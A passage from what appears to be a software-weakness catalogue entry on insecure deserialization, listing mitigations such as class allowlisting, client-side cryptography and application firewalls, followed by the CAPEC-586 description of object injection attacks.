Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.
Mitigation
Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-586: Object Injection
An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.